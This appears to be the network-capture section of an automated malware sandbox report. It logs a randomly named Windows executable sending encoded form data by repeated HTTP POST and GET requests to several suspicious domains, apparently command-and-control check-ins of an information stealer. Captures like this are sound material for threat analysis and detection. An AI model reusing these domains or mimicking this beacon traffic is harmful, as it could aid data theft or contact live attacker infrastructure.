                                                                                                                              Oct 7, 2024 12:34:00.756895065 CEST | 195 | IN


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              6 | 192.168.2.6 | 49996 | 104.21.5.125 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:34:02.461504936 CEST | 787 | OUT | POST /kpbt/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Origin: http://www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.golizle22.xyz/kpbt/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=Wx6XlLs/CN3f8MFgtkt7/mPxI8KDW4jn7LvDVODgSmzheFa6UOhS+62CT64XFTy/ZK4wCR4ZXGXgZH3gNNm5Yt++2TyhimoeGSUyhtaVSdBf+Fjl64rm2VG8Uaf10b93nIF2LdcUemcVwwEo3MsqZYB9TZQArgNN76T8IfeLjR31xuzx9eFzD6F2kCN1KSdZdP/3AaIfxmvt0kPYOFfKnl5MfjEir+Zj7w==
                                                                                                                              Oct 7, 2024 12:34:03.309200048 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:03 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdca9yCKIUd0ide0nZ31LWurKy8GwdMBWW1LfuqAS7NIm6v%2BfLYCgBqvOBsBSj%2BC8nIw5x8UAtAI%2FaiqCgiB4Jj8TNxjcn3gs8r8z%2BOqymherLgkh3E%2FFXuRLqule9%2Bk66CpOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3c881df40fa5-EWR
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Oct 7, 2024 12:34:03.309217930 CEST | 197 | IN


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              7 | 192.168.2.6 | 49998 | 104.21.5.125 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:34:05.032109976 CEST | 1800 | OUT | POST /kpbt/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Origin: http://www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.golizle22.xyz/kpbt/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                               Data Ascii: ej6Le= [TRUNCATED]
                                                                                                                               Oct 7, 2024 12:34:05.847724915 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:05 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DlypyjFHiEkxP%2Bd7LkTEOG1O1ahbNnUfRqpTE%2F8oY2YD5rdrOwG22n82myIHMqH6%2BgiKJ9DcTzCK6DWaoZPrPeo%2FELQyrk8ZyEtk6Rlv%2BhUhG60qzttPcdtsJRWKZKsQa0Wg0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3c97ff1141df-EWR
                                                                                                                              Content-Encoding: gzip
                                                                                                                               Oct 7, 2024 12:34:05.847742081 CEST | 195 | IN


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               8 | 192.168.2.6 | 49999 | 104.21.5.125 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:07.574522018 CEST | 505 | OUT | GET /kpbt/?An=mLdxo2Y8RLRh&ej6Le=bzS3m8wIdYLAo6JC2B8v6DjkcYKoJ+/o0NmGFeD5SFiVCQOeD71i1fiBX/Z3MR+4fZ4gDTM+AXXLFXHhSs/mG9Ow8FixmQY8Mzsb0tyXAIso2XGTy+nTpErXCIb5tNtL4I1fOo4= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                               Oct 7, 2024 12:34:08.398132086 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:08 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FQpy3yq3u3lgGcrRTufJL2fOEYn2ANFOb%2FgwsKv8PCDybak1Mlt79eFmPM7Nd%2BcdtCRHAGAX6FLCfT1S8uhVu3ZdUzmS95LjP%2F2KF%2F9902u0BqHHwDfBnUjsAoyoXaI7JH9fQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3ca7eac88cc6-EWR
                                                                                                                              Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left:
                                                                                                                               Oct 7, 2024 12:34:08.398183107 CEST | 758 | IN
                                                                                                                              Data Ascii: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               9 | 192.168.2.6 | 50000 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:13.454796076 CEST | 787 | OUT | POST /fp1z/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Origin: http://www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.impulsarnegocios.info/fp1z/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=ZOVpGAfEV/t0moYfDXOTeCQHR0STDy1ArYNp7YI2LyI9oQLinyuNMw44j9PKRe1XcNULfSVKiAPOm35Avf6M2H13S309v6W895vaQYXegc2SdeLWCkvoXOxEMJxJcl8QCVSqlW02Rul1228FPNK2DttphYXZZ4KIcTdHgpAMZsrIm4zyCSi+mF4faUC6JkWLHCIkxM+IRp4z


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               10 | 192.168.2.6 | 50001 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:15.997273922 CEST | 811 | OUT | POST /fp1z/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Origin: http://www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.impulsarnegocios.info/fp1z/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=ZOVpGAfEV/t0nIofPWOTYiQGU0STKS0HrYRp7ZNrMA89px7im2aNLw44sdPPf+0VcNI5fTFKiAbOmy9AvMiP2X0RHn07iaW895vaQc+7gYaSeu7WBFvnUOxLcZxJYl8UCVSUlXoMRqV12ywFOeS1Nttrv4WpQ6T4bC1Gjpc9HsDZquyoehid0VYdaWaIJEWhFCwkjbyveddQ0X93JythgiAIwQbHXYq+kQ==


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               11 | 192.168.2.6 | 50003 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:18.537975073 CEST | 1824 | OUT | POST /fp1z/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Origin: http://www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.impulsarnegocios.info/fp1z/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                               Data Ascii: ej6Le= [TRUNCATED]


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               12 | 192.168.2.6 | 50004 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:21.068662882 CEST | 513 | OUT | GET /fp1z/?ej6Le=UM9JF3nEU4xQ/PwLWGC6ZGprDkqeXDETquU6+bQNCANtrDf9n2+FDVI8iqG/UPksDfc6HQNuzTnZ4EJOssmSqFcoG0I3gKiI2YTwSr3+9s/MRsmHXzjzE9U3d6U0PlwuaFK3vCk=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                               Oct 7, 2024 12:34:22.446708918 CEST | 413 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:22 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=UM9JF3nEU4xQ/PwLWGC6ZGprDkqeXDETquU6+bQNCANtrDf9n2+FDVI8iqG/UPksDfc6HQNuzTnZ4EJOssmSqFcoG0I3gKiI2YTwSr3+9s/MRsmHXzjzE9U3d6U0PlwuaFK3vCk=&An=mLdxo2Y8RLRh"}</script></head></html>


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               13 | 192.168.2.6 | 50005 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:27.501383066 CEST | 787 | OUT | POST /odii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Origin: http://www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202541.sbs/odii/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=QXpH8LlsuQ4qYBHCRaWXsil4iOBwRZ9KVrewgxYr9Xi0AImBQr1JxMmX31Jmygd6BoFaGBz5HI1CEYSOLGgCHh9/oJbG2nlIJ0jf4iLI+AxfQLWndcTOWMPLQc5rzwb5IGQTZIcut4YvKgcw0vDjANTXweFjvWyHVGLoKDYlr485PKhc0LfqmQ7CKuYbCAPismjLCwM0sE6g
                                                                                                                               Oct 7, 2024 12:34:28.111026049 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:34:28 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               14 | 192.168.2.6 | 50006 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:30.051422119 CEST | 811 | OUT | POST /odii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Origin: http://www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202541.sbs/odii/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=QXpH8LlsuQ4qZh3CQ5uX7yl7nOBwHp9OVriwg04B9lG0OJWBRpNJ2MmX4VIs9AdkBoJSGD35HIxCEYCOL1YDGx95kpbY1XlIJ0jf4ifu+DBfQbGnd9TBfsPMXc5rggb9IGQ9ZJwEt7svKhsw0+DgONTR0eEQgWTsQmikOScW8Y5SDcgGo4fJ0AbAKsApCgPIumbLQnATjwfDLk23pOH1tNfxGyadITypTw==
                                                                                                                               Oct 7, 2024 12:34:30.677895069 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:34:30 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               15 | 192.168.2.6 | 50008 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:32.589368105 CEST | 1824 | OUT | POST /odii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Origin: http://www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202541.sbs/odii/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                               Oct 7, 2024 12:34:33.201721907 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:34:33 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close


                                                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                               16 | 192.168.2.6 | 50009 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                                                               Oct 7, 2024 12:34:35.156199932 CEST | 513 | OUT | GET /odii/?ej6Le=dVBn/8h3nxQ+NW3HHa2Dil9IxOpuSbZnLfq0vBwwz2PjK6Osa+4r5Mmz4BUq4xUHF4JCazXFRId1LoC3dnRZfR9dh4rO42NOGnzVyjLt/mUqEpvHWr7qJMesP485wi7mHEQ5T/k=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                               Oct 7, 2024 12:34:35.712127924 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              date: Mon, 07 Oct 2024 10:34:35 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                                              Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              17 | 192.168.2.6 | 50010 | 161.97.168.245 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:34:40.966978073 CEST | 769 | OUT | POST /epk2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Origin: http://www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.acuarelacr.buzz/epk2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=0j6poGQ4bIqrtq33oyCmStW/mp82+t2YJ6clidkHpCqIsx7erHA49ike5uZ/Lmvb4H+ZGJn+P9BVFCdSXleHGJaWLHHUJmogdRh/flj7rfyFskDXEI78UWUugKGp1tjpH55RDPiQWbI/C8eoIULq4qP3mBbkKrbaJe6ph8sg2/yJMqOQSRDKGG6+p/5wAC8ESexDOg2a59t1
                                                                                                                              Oct 7, 2024 12:34:41.558974981 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:41 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: W/"66cd104a-b96"
                                                                                                                              Content-Encoding: gzip


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              18 | 192.168.2.6 | 50011 | 161.97.168.245 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:34:43.512648106 CEST | 793 | OUT | POST /epk2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Origin: http://www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.acuarelacr.buzz/epk2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=0j6poGQ4bIqrtKH3rVemDdW8jp820N2cJ6QlicRApwOIsUfeqFk4wCkeyOZ6WWvQ4HyrGMH+P9VVFDtSXUeEGZaUDnHWGGogdRh/fl3BrfqFvVTXFp7jKGUvlKGpxtjlH55zDOv1WZA/C8uoLAflj6P1rhaJEaqmLonrlqkTvtKtE8PKOiDpUWa8p9hCAi8uQeJDc3692JIWsBmWJCI456laoWHb0oyG6Q==
                                                                                                                              Oct 7, 2024 12:34:44.112163067 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:44 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
